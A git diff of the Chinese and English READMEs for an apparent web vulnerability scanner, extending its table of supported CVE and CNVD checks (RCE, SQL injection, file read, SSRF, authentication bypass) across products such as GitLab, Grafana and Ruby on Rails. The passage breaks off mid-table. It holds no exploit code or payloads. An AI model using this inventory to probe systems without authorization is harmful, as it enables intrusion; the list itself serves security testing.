diff --git a/README.md b/README.md
index 7ef23a1..eb805eb 100644
--- a/README.md
+++ b/README.md
@@ -6,108 +6,126 @@
* 如果有什么想法、建议或者遇到了BUG, 都可以issues
**目前支持扫描的web应用程序有:**
-> AlibabaDruid, AlibabaNacos, ApacheAirflow, ApacheAPISIX, ApacheFlink, ApacheSolr, ApacheStruts2, ApacheTomcat, AppWeb, AtlassianConfluence, Cicso, Discuz, Django, Drupal, ElasticSearch, F5-BIG-IP, Fastjson, Jenkins, Keycloak, mongo-express, Node.js, NodeRED, ShowDoc, Spring, ThinkPHP, Ueditor, Weblogic, Webmin, Yonyou
+> AlibabaDruid, AlibabaNacos, ApacheAirflow, ApacheAPISIX, ApacheFlink, ApacheHadoop, ApacheSolr, ApacheStruts2, ApacheTomcat, AppWeb, AtlassianConfluence, Cicso, Discuz, Django, Drupal, ElasticSearch, F5-BIG-IP, Fastjson, Gitea, Gitlab, Grafana, Landray-OA, RubyOnRails, Jenkins, Keycloak, mongo-express, Node.js, NodeRED, ShowDoc, Spring, ThinkPHP, Ueditor, Weblogic, Webmin, Yonyou
<details>
<summary><strong>目前支持扫描的web漏洞有: [点击展开]</strong></summary>
```
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| Target | Vul_id | Type | Method | Description |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| Alibaba Druid | None | unAuth | GET | 阿里巴巴Druid未授权访问 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| Alibaba Nacos | CVE-2021-29441 | unAuth | GET/POST | 阿里巴巴Nacos未授权访问 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| Apache Airflow | CVE-2020-17526 | unAuth | GET | Airflow身份验证绕过 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| Apache APISIX | CVE-2020-13945 | unAuth | GET | Apache APISIX默认密钥 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| Apache Flink | CVE-2020-17519 | FileRead | GET | Flink目录遍历 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| Apache Solr | CVE-2021-27905 | SSRF | GET/POST | Solr SSRF/任意文件读取 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| Apache Struts2 | S2-001 | RCE | POST | Struts2远程代码执行 |
-| Apache Struts2 | S2-005 | RCE | GET | Struts2远程代码执行 |
-| Apache Struts2 | S2-007 | RCE | GET | Struts2远程代码执行 |
-| Apache Struts2 | S2-008 | RCE | GET | Struts2远程代码执行 |
-| Apache Struts2 | S2-009 | RCE | GET | Struts2远程代码执行 |
-| Apache Struts2 | S2-012 | RCE | GET | Struts2远程代码执行 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| Apache Tomcat | CVE-2017-12615 | FileUpload | PUT | PUT方法任意文件写入 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| AppWeb | CVE-2018-8715 | unAuth | GET | AppWeb身份认证绕过 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| Atlassian Confluence | CVE-2015-8399 | FileRead | GET | Confluence任意文件包含 |
-| Atlassian Confluence | CVE-2019-3396 | RCE/FileRead | POST | Confluence路径遍历和命令执行 |
-| Atlassian Confluence | CVE-2021-26084 | RCE | POST | Confluence Webwork Pre-Auth OGNL表达式命令注入 |
-| Atlassian Confluence | CVE-2022-26134 | RCE | GET | Confluence远程代码执行 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| Cisco | CVE-2020-3580 | XSS | POST | 思科ASA/FTD XSS跨站脚本攻击 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| Discuz | wooyun-2010-080723 | RCE | GET | 全局变量防御绕过RCE |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| Django | CVE-2017-12794 | XSS | GET | debug page XSS跨站脚本攻击 |
-| Django | CVE-2018-14574 | Redirect | GET | CommonMiddleware url重定向 |
-| Django | CVE-2019-14234 | SQLinject | GET | JSONfield SQL注入 |
-| Django | CVE-2020-9402 | SQLinject | GET | GIS SQL注入 |
-| Django | CVE-2021-35042 | SQLinject | GET | QuerySet.order_by SQL注入 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| Drupal | CVE-2014-3704 | SQLinject | POST | Drupal < 7.32 Drupalgeddon SQL 注入 |
-| Drupal | CVE-2017-6920 | RCE | POST | Drupal Core 8 PECL YAML 反序列化代码执行 |
-| Drupal | CVE-2018-7600 | RCE | POST | Drupal Drupalgeddon 2 远程代码执行 |
-| Drupal | CVE-2018-7602 | RCE | POST | Drupal 远程代码执行 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| ElasticSearch | CVE-2014-3120 | RCE | POST | ElasticSearch命令执行 |
-| ElasticSearch | CVE-2015-1427 | RCE | POST | ElasticSearch Groovy 沙盒绕过&&代码执行 |
-| ElasticSearch | CVE-2015-3337 | FileRead | GET | ElasticSearch 目录穿越 |
-| ElasticSearch | CVE-2015-5531 | FileRead | PUT/GET | ElasticSearch 目录穿越 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| F5 BIG-IP | CVE-2020-5902 | RCE | GET | BIG-IP远程代码执行 |
-| F5 BIG-IP | CVE-2022-1388 | unAuth | POST | BIG-IP身份认证绕过 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| Fastjson | CNVD-2017-02833 | unSerialize | POST | Fastjson <= 1.2.24 反序列化 |
-| Fastjson | CNVD-2019-22238 | unSerialize | POST | Fastjson <= 1.2.47 反序列化 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| Jenkins | CVE-2018-1000861 | RCE | POST | jenkins 远程命令执行 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| Keycloak | CVE-2020-10770 | SSRF | GET | 使用request_uri调用未经验证的URL |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| mongo-express | CVE-2019-10758 | RCE | POST | 未授权远程代码执行 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| Nodejs | CVE-2017-14849 | FileRead | GET | Node.js目录穿越 |
-| Nodejs | CVE-2021-21315 | RCE | GET | Node.js命令执行 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| NodeRED | CVE-2021-3223 | FileRead | GET | Node-RED 任意文件读取 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| ShowDoc | CNVD-2020-26585 | FileUpload | POST | ShowDoc 任意文件上传 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| Spring | CVE-2020-5410 | FileRead | GET | Spring Cloud目录遍历 |
-| Spring | CVE-2021-21234 | FileRead | GET | Spring Boot目录遍历 |
-| Spring | CVE-2022-22947 | RCE | POST | Spring Cloud Gateway SpEl远程代码执行 |
-| Spring | CVE-2022-22963 | RCE | POST | Spring Cloud Function SpEL远程代码执行 |
-| Spring | CVE-2022-22965 | RCE | GET/POST | Spring Framework远程代码执行 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| ThinkPHP | CVE-2018-1002015 | RCE | GET | ThinkPHP5.x 远程代码执行 |
-| ThinkPHP | CNVD-2018-24942 | RCE | GET | 未开启强制路由导致RCE |
-| ThinkPHP | CNNVD-201901-445 | RCE | POST | 核心类Request远程代码执行 |
-| ThinkPHP | None | RCE | GET | ThinkPHP2.x 远程代码执行 |
-| ThinkPHP | None | SQLinject | GET | ThinkPHP5 ids参数SQL注入 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| Ueditor | None | SSRF | GET | Ueditor编辑器SSRF |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| Oracle Weblogic | CVE-2014-4210 | SSRF | GET | Weblogic 服务端请求伪造 |
-| Oracle Weblogic | CVE-2017-10271 | unSerialize | POST | Weblogic XMLDecoder反序列化 |
-| Oracle Weblogic | CVE-2019-2725 | unSerialize | POST | Weblogic wls9_async反序列化 |
-| Oracle Weblogic | CVE-2020-14750 | unAuth | GET | Weblogic 权限验证绕过 |
-| Oracle Weblogic | CVE-2020-14882 | RCE | GET | Weblogic 未授权命令执行 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| Webmin | CVE-2019-15107 | RCE | POST | Webmin Pre-Auth 远程代码执行 |
-| Webmin | CVE-2019-15642 | RCE | POST | Webmin 远程代码执行 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| Yonyou | CNVD-2021-30167 | RCE | GET | 用友NC BeanShell远程命令执行 |
-| Yonyou | None | FileRead | GET | 用友ERP-NC NCFindWeb目录遍历 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Target | Vul_id | Type | Description |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Alibaba Druid | None | unAuth | 阿里巴巴Druid未授权访问 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Alibaba Nacos | CVE-2021-29441 | unAuth | 阿里巴巴Nacos未授权访问 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Apache Airflow | CVE-2020-17526 | unAuth | Airflow身份验证绕过 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Apache APISIX | CVE-2020-13945 | unAuth | Apache APISIX默认密钥 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Apache Flink | CVE-2020-17519 | FileRead | Flink目录遍历 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Apache Hadoop | None | unAuth | Hadoop YARN ResourceManager 未授权访问 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Apache Solr | CVE-2021-27905 | SSRF | Solr SSRF/任意文件读取 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Apache Struts2 | S2-001 | RCE | Struts2远程代码执行 |
+| Apache Struts2 | S2-005 | RCE | Struts2远程代码执行 |
+| Apache Struts2 | S2-007 | RCE | Struts2远程代码执行 |
+| Apache Struts2 | S2-008 | RCE | Struts2远程代码执行 |
+| Apache Struts2 | S2-009 | RCE | Struts2远程代码执行 |
+| Apache Struts2 | S2-012 | RCE | Struts2远程代码执行 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Apache Tomcat | CVE-2017-12615 | FileUpload | PUT方法任意文件写入 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| AppWeb | CVE-2018-8715 | unAuth | AppWeb身份认证绕过 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Atlassian Confluence | CVE-2015-8399 | FileRead | Confluence任意文件包含 |
+| Atlassian Confluence | CVE-2019-3396 | RCE/FileRead | Confluence路径遍历和命令执行 |
+| Atlassian Confluence | CVE-2021-26084 | RCE | Confluence Webwork Pre-Auth OGNL表达式命令注入 |
+| Atlassian Confluence | CVE-2022-26134 | RCE | Confluence远程代码执行 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Cisco | CVE-2020-3580 | XSS | 思科ASA/FTD XSS跨站脚本攻击 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Discuz | wooyun-2010-080723 | RCE | 全局变量防御绕过RCE |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Django | CVE-2017-12794 | XSS | debug page XSS跨站脚本攻击 |
+| Django | CVE-2018-14574 | Redirect | CommonMiddleware url重定向 |
+| Django | CVE-2019-14234 | SQLinject | JSONfield SQL注入 |
+| Django | CVE-2020-9402 | SQLinject | GIS SQL注入 |
+| Django | CVE-2021-35042 | SQLinject | QuerySet.order_by SQL注入 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Drupal | CVE-2014-3704 | SQLinject | Drupal < 7.32 Drupalgeddon SQL 注入 |
+| Drupal | CVE-2017-6920 | RCE | Drupal Core 8 PECL YAML 反序列化代码执行 |
+| Drupal | CVE-2018-7600 | RCE | Drupal Drupalgeddon 2 远程代码执行 |
+| Drupal | CVE-2018-7602 | RCE | Drupal 远程代码执行 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| ElasticSearch | CVE-2014-3120 | RCE | ElasticSearch命令执行 |
+| ElasticSearch | CVE-2015-1427 | RCE | ElasticSearch Groovy 沙盒绕过&&代码执行 |
+| ElasticSearch | CVE-2015-3337 | FileRead | ElasticSearch 目录穿越 |
+| ElasticSearch | CVE-2015-5531 | FileRead | ElasticSearch 目录穿越 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| F5 BIG-IP | CVE-2020-5902 | RCE | BIG-IP远程代码执行 |
+| F5 BIG-IP | CVE-2022-1388 | unAuth | BIG-IP身份认证绕过 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Fastjson | CNVD-2017-02833 | unSerialize | Fastjson <= 1.2.24 反序列化 |
+| Fastjson | CNVD-2019-22238 | unSerialize | Fastjson <= 1.2.47 反序列化 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Gitea | None | unAuth | Gitea 1.4.0 未授权访问 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Gitlab | CVE-2021-22205 | RCE | GitLab Pre-Auth 远程命令执行 |
+| Gitlab | CVE-2021-22214 | SSRF | Gitlab CI Lint API未授权 SSRF |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Grafana | CVE-2021-43798 | FileRead | Grafana 8.x 插件模块路径遍历 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Jenkins | CVE-2018-1000861 | RCE | jenkins 远程命令执行 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Keycloak | CVE-2020-10770 | SSRF | 使用request_uri调用未经验证的URL |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Landray | CNVD-2021-28277 | FileRead/SSRF| 蓝凌OA 任意文件读取/SSRF |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| mongo-express | CVE-2019-10758 | RCE | 未授权远程代码执行 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Nodejs | CVE-2017-14849 | FileRead | Node.js目录穿越 |
+| Nodejs | CVE-2021-21315 | RCE | Node.js命令执行 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| NodeRED | CVE-2021-3223 | FileRead | Node-RED 任意文件读取 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Ruby on Rails | CVE-2018-3760 | FileRead | Ruby on Rails 路径遍历 |
+| Ruby on Rails | CVE-2019-5418 | FileRead | Ruby on Rails 任意文件读取 |
+| Ruby on Rails | CVE-2020-8163 | RCE | Ruby on Rails 命令执行 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| ShowDoc | CNVD-2020-26585 | FileUpload | ShowDoc 任意文件上传 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Spring | CVE-2020-5410 | FileRead | Spring Cloud目录遍历 |
+| Spring | CVE-2021-21234 | FileRead | Spring Boot目录遍历 |
+| Spring | CVE-2022-22947 | RCE | Spring Cloud Gateway SpEl远程代码执行 |
+| Spring | CVE-2022-22963 | RCE | Spring Cloud Function SpEL远程代码执行 |
+| Spring | CVE-2022-22965 | RCE | Spring Framework远程代码执行 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| ThinkPHP | CVE-2018-1002015 | RCE | ThinkPHP5.x 远程代码执行 |
+| ThinkPHP | CNVD-2018-24942 | RCE | 未开启强制路由导致RCE |
+| ThinkPHP | CNNVD-201901-445 | RCE | 核心类Request远程代码执行 |
+| ThinkPHP | None | RCE | ThinkPHP2.x 远程代码执行 |
+| ThinkPHP | None | SQLinject | ThinkPHP5 ids参数SQL注入 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Ueditor | None | SSRF | Ueditor编辑器SSRF |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Oracle Weblogic | CVE-2014-4210 | SSRF | Weblogic 服务端请求伪造 |
+| Oracle Weblogic | CVE-2017-10271 | unSerialize | Weblogic XMLDecoder反序列化 |
+| Oracle Weblogic | CVE-2019-2725 | unSerialize | Weblogic wls9_async反序列化 |
+| Oracle Weblogic | CVE-2020-14750 | unAuth | Weblogic 权限验证绕过 |
+| Oracle Weblogic | CVE-2020-14882 | RCE | Weblogic 未授权命令执行 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Webmin | CVE-2019-15107 | RCE | Webmin Pre-Auth 远程代码执行 |
+| Webmin | CVE-2019-15642 | RCE | Webmin 远程代码执行 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Yonyou | CNNVD-201610-923 | SQLinject | 用友GRP-U8 Proxy SQL注入 |
+| Yonyou | CNVD-2021-30167 | RCE | 用友NC BeanShell远程命令执行 |
+| Yonyou | None | FileRead | 用友ERP-NC NCFindWeb目录遍历 |
+| Yonyou | None | DSinfo | 用友U8 OA getSessionList.jsp 敏感信息泄漏 |
+| Yonyou | None | SQLinject | 用友U8 OA test.jsp SQL注入 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
```
</details>
diff --git a/README_en-us.md b/README_en-us.md
index 8ba3b09..b67389b 100644
--- a/README_en-us.md
+++ b/README_en-us.md
@@ -5,108 +5,126 @@
* If you have any ideas, suggestions, or bugs, you can issue
**Web applications that currently support scanning:**
-> AlibabaDruid, AlibabaNacos, ApacheAirflow, ApacheAPISIX, ApacheFlink, ApacheSolr, ApacheStruts2, ApacheTomcat, AppWeb, AtlassianConfluence, Cicso, Discuz, Django, Drupal, ElasticSearch, F5-BIG-IP, Fastjson, Jenkins, Keycloak, mongo-express, Node.js, NodeRED, ShowDoc, Spring, ThinkPHP, Ueditor, Weblogic, Webmin, Yonyou
+> AlibabaDruid, AlibabaNacos, ApacheAirflow, ApacheAPISIX, ApacheFlink, ApacheHadoop, ApacheSolr, ApacheStruts2, ApacheTomcat, AppWeb, AtlassianConfluence, Cicso, Discuz, Django, Drupal, ElasticSearch, F5-BIG-IP, Fastjson, Gitea, Gitlab, Grafana, Landray-OA, RubyOnRails, Jenkins, Keycloak, mongo-express, Node.js, NodeRED, ShowDoc, Spring, ThinkPHP, Ueditor, Weblogic, Webmin, Yonyou
<details>
<summary><strong>The current web vulnerabilities that support scanning: [Click on]</strong></summary>
```
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| Target | Vul_id | Type | Method | Description |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| Alibaba Druid | None | unAuth | GET | Alibaba Druid unAuthorized |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| Alibaba Nacos | CVE-2021-29441 | unAuth | GET/POST | Alibaba Nacos unAuthorized |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| Apache Airflow | CVE-2020-17526 | unAuth | GET | Airflow Authentication bypass |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| Apache APISIX | CVE-2020-13945 | unAuth | GET | Apache APISIX default access token |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| Apache Flink | CVE-2020-17519 | FileRead | GET | Flink Directory traversal |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| Apache Solr | CVE-2021-27905 | SSRF | GET/POST | Solr SSRF/FileRead |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| Apache Struts2 | S2-001 | RCE | POST | Struts2 Remote code execution |
-| Apache Struts2 | S2-005 | RCE | GET | Struts2 Remote code execution |
-| Apache Struts2 | S2-007 | RCE | GET | Struts2 Remote code execution |
-| Apache Struts2 | S2-008 | RCE | GET | Struts2 Remote code execution |
-| Apache Struts2 | S2-009 | RCE | GET | Struts2 Remote code execution |
-| Apache Struts2 | S2-012 | RCE | GET | Struts2 Remote code execution |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| Apache Tomcat | CVE-2017-12615 | FileUpload | PUT | Put method writes to any file |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| AppWeb | CVE-2018-8715 | unAuth | GET | AppWeb Authentication bypass |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| Atlassian Confluence | CVE-2015-8399 | FileRead | GET | Confluence any file include |
-| Atlassian Confluence | CVE-2019-3396 | RCE/FileRead | POST | Confluence Directory traversal && RCE |
-| Atlassian Confluence | CVE-2021-26084 | RCE | POST | Confluence OGNL expression command injection |
-| Atlassian Confluence | CVE-2022-26134 | RCE | GET | Confluence Remote code execution |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| Cisco | CVE-2020-3580 | XSS | POST | Cisco ASA/FTD XSS |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| Discuz | wooyun-2010-080723 | RCE | GET | Remote code execution |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| Django | CVE-2017-12794 | XSS | GET | Django debug page XSS |
-| Django | CVE-2018-14574 | Redirect | GET | Django CommonMiddleware URL Redirect |
-| Django | CVE-2019-14234 | SQLinject | GET | Django JSONfield SQLinject |
-| Django | CVE-2020-9402 | SQLinject | GET | Django GIS SQLinject |
-| Django | CVE-2021-35042 | SQLinject | GET | Django QuerySet.order_by SQLinject |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| Drupal | CVE-2014-3704 | SQLinject | POST | Drupal < 7.32 Drupalgeddon SQLinject |
-| Drupal | CVE-2017-6920 | RCE | POST | Drupal Core 8 PECL YAML Remote code execution |
-| Drupal | CVE-2018-7600 | RCE | POST | Drupal Drupalgeddon 2 Remote code execution |
-| Drupal | CVE-2018-7602 | RCE | POST | Drupal Remote code execution |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| ElasticSearch | CVE-2014-3120 | RCE | POST | ElasticSearch Remote code execution |
-| ElasticSearch | CVE-2015-1427 | RCE | POST | ElasticSearch Groovy Sandbox to bypass && RCE |
-| ElasticSearch | CVE-2015-3337 | FileRead | GET | ElasticSearch Directory traversal |
-| ElasticSearch | CVE-2015-5531 | FileRead | PUT/GET | ElasticSearch Directory traversal |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| F5 BIG-IP | CVE-2020-5902 | RCE | GET | BIG-IP Remote code execution |
-| F5 BIG-IP | CVE-2022-1388 | unAuth | POST | BIG-IP Authentication bypass |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| Fastjson | CNVD-2017-02833 | unSerialize | POST | Fastjson <= 1.2.24 deSerialization |
-| Fastjson | CNVD-2019-22238 | unSerialize | POST | Fastjson <=1.2.47 deSerialization |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| Jenkins | CVE-2018-1000861 | RCE | POST | jenkins Remote code execution |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| Keycloak | CVE-2020-10770 | SSRF | GET | request_uri SSRF |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| mongo-express | CVE-2019-10758 | RCE | POST | Remote code execution |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| Nodejs | CVE-2017-14849 | FileRead | GET | Node.js Directory traversal |
-| Nodejs | CVE-2021-21315 | RCE | GET | Node.js Remote code execution |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| NodeRED | CVE-2021-3223 | FileRead | GET | Node-RED Directory traversal |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| ShowDoc | CNVD-2020-26585 | FileUpload | POST | ShowDoc writes to any file |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| Spring | CVE-2020-5410 | FileRead | GET | Spring Cloud Directory traversal |
-| Spring | CVE-2021-21234 | FileRead | GET | Spring Boot Directory traversal |
-| Spring | CVE-2022-22947 | RCE | POST | Spring Cloud Gateway SpEl Remote code execution |
-| Spring | CVE-2022-22963 | RCE | POST | Spring Cloud Function SpEL Remote code execution |
-| Spring | CVE-2022-22965 | RCE | GET/POST | Spring Framework Remote code execution |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| ThinkPHP | CVE-2018-1002015 | RCE | GET | ThinkPHP5.x Remote code execution |
-| ThinkPHP | CNVD-2018-24942 | RCE | GET | The forced route is not enabled Remote code execution |
-| ThinkPHP | CNNVD-201901-445 | RCE | POST | Core class Request Remote code execution |
-| ThinkPHP | None | RCE | GET | ThinkPHP2.x Remote code execution |
-| ThinkPHP | None | SQLinject | GET | ThinkPHP5 ids SQLinject |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| Ueditor | None | SSRF | GET | Ueditor SSRF |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| Oracle Weblogic | CVE-2014-4210 | SSRF | GET | Weblogic SSRF |
-| Oracle Weblogic | CVE-2017-10271 | unSerialize | POST | Weblogic XMLDecoder deSerialization |
-| Oracle Weblogic | CVE-2019-2725 | unSerialize | POST | Weblogic wls9_async deSerialization |
-| Oracle Weblogic | CVE-2020-14750 | unAuth | GET | Weblogic Authentication bypass |
-| Oracle Weblogic | CVE-2020-14882 | RCE | GET | Weblogic Unauthorized command execution |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| Webmin | CVE-2019-15107 | RCE | POST | Webmin Pre-Auth Remote code execution |
-| Webmin | CVE-2019-15642 | RCE | POST | Webmin Remote code execution |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| Yonyou | CNVD-2021-30167 | RCE | GET | Yonyou-NC BeanShell Remote code execution |
-| Yonyou | None | FileRead | GET | Yonyou-ERP-NC NCFindWeb Directory traversal |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Target | Vul_id | Type | Description |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Alibaba Druid | None | unAuth | Alibaba Druid unAuthorized |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Alibaba Nacos | CVE-2021-29441 | unAuth | Alibaba Nacos unAuthorized |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Apache Airflow | CVE-2020-17526 | unAuth | Airflow Authentication bypass |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Apache APISIX | CVE-2020-13945 | unAuth | Apache APISIX default access token |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Apache Flink | CVE-2020-17519 | FileRead | Flink Directory traversal |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Apache Hadoop | None | unAuth | Hadoop YARN ResourceManager unAuthorized |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Apache Solr | CVE-2021-27905 | SSRF | Solr SSRF/FileRead |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Apache Struts2 | S2-001 | RCE | Struts2 Remote code execution |
+| Apache Struts2 | S2-005 | RCE | Struts2 Remote code execution |
+| Apache Struts2 | S2-007 | RCE | Struts2 Remote code execution |
+| Apache Struts2 | S2-008 | RCE | Struts2 Remote code execution |
+| Apache Struts2 | S2-009 | RCE | Struts2 Remote code execution |
+| Apache Struts2 | S2-012 | RCE | Struts2 Remote code execution |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Apache Tomcat | CVE-2017-12615 | FileUpload | Put method writes to any file |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| AppWeb | CVE-2018-8715 | unAuth | AppWeb Authentication bypass |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Atlassian Confluence | CVE-2015-8399 | FileRead | Confluence any file include |
+| Atlassian Confluence | CVE-2019-3396 | RCE/FileRead | Confluence Directory traversal && RCE |
+| Atlassian Confluence | CVE-2021-26084 | RCE | Confluence OGNL expression command injection |
+| Atlassian Confluence | CVE-2022-26134 | RCE | Confluence Remote code execution |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Cisco | CVE-2020-3580 | XSS | Cisco ASA/FTD XSS |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Discuz | wooyun-2010-080723 | RCE | Remote code execution |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Django | CVE-2017-12794 | XSS | Django debug page XSS |
+| Django | CVE-2018-14574 | Redirect | Django CommonMiddleware URL Redirect |
+| Django | CVE-2019-14234 | SQLinject | Django JSONfield SQLinject |
+| Django | CVE-2020-9402 | SQLinject | Django GIS SQLinject |
+| Django | CVE-2021-35042 | SQLinject | Django QuerySet.order_by SQLinject |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Drupal | CVE-2014-3704 | SQLinject | Drupal < 7.32 Drupalgeddon SQLinject |
+| Drupal | CVE-2017-6920 | RCE | Drupal Core 8 PECL YAML Remote code execution |
+| Drupal | CVE-2018-7600 | RCE | Drupal Drupalgeddon 2 Remote code execution |
+| Drupal | CVE-2018-7602 | RCE | Drupal Remote code execution |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| ElasticSearch | CVE-2014-3120 | RCE | ElasticSearch Remote code execution |
+| ElasticSearch | CVE-2015-1427 | RCE | ElasticSearch Groovy Sandbox to bypass && RCE |
+| ElasticSearch | CVE-2015-3337 | FileRead | ElasticSearch Directory traversal |
+| ElasticSearch | CVE-2015-5531 | FileRead | ElasticSearch Directory traversal |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| F5 BIG-IP | CVE-2020-5902 | RCE | BIG-IP Remote code execution |
+| F5 BIG-IP | CVE-2022-1388 | unAuth | BIG-IP Authentication bypass |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Fastjson | CNVD-2017-02833 | unSerialize | Fastjson <= 1.2.24 deSerialization |
